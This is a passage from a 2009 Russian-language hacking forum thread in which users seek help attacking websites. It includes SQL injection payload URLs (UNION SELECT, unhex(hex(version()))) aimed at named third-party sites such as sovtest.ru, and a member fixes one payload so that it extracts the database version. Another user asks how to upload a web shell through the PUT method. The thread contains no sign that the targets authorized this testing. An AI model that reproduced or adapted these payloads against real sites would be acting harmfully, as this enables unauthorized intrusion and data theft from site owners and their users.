ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.02.2009, 12:32
|
|
Участник форума
Регистрация: 02.01.2008
Сообщений: 116
Провел на форуме:
1013405
Репутация:
58
|
|
когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.
что то можна зделать?
|
|
|
19.02.2009, 12:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от D1mka
когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.
что то можна зделать?
установить необходимые права и спать спокойно.
|
|
|
|
19.02.2009, 15:26
|
|
Новичок
Регистрация: 10.03.2008
Сообщений: 27
Провел на форуме:
71866
Репутация:
1
|
|
Можно ли провернуть SQL injection при ошибке следующего вида:
http://beatlesfestival.net.ua/requests.php?action=reset&requestid=sql'
Читал faq'и, везде используют конструкции вида +union+select+кол-во_полей--
А в данном случае, не пойму как это заюзать.
|
|
|
|
19.02.2009, 15:32
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
А с чего ты взял, что оно там есть и что оно не пофиксено?
|
|
|
|
19.02.2009, 15:37
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
|
|
|
|
19.02.2009, 15:41
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Сообщение от Assembler
http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
http://www.sovtest.ru/news.php?id=99999+union+select+1,unhex(hex(version ())),3,4,5,6,7,8--
|
|
|
|
19.02.2009, 15:43
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
|
|
|
|
19.02.2009, 15:47
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Сообщение от Assembler
aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
p.s: пробелы удали =\
|
|
|
|
19.02.2009, 18:49
|
|
Познающий
Регистрация: 09.05.2008
Сообщений: 95
Провел на форуме:
433917
Репутация:
86
|
|
Мм... Дайте почитать что-нибудь о PUT, TRACE и WRITE методах.
Или подскажите... Есть сайт, у него корень со всеми этими параметрами... Как мне загрузить туда шелл, etc.?
Спасибо...
|
|
|
|
19.02.2009, 18:53
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Stradi , тоесть нам нужно поискать в гугле и выложить тебе готовые линки? Или как?
Ты считаешь это вопрос по уязвимостям?
ГУГЛ:
RFC 2068
http://lib.misto.kiev.ua/WEBMASTER/rfc2068/rfc2068rus.txt
Если что-то ещё найти, обращайтесь, но сначала лучше попытаться сдесь:
Жмах
Последний раз редактировалось jokester; 19.02.2009 в 19:00..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
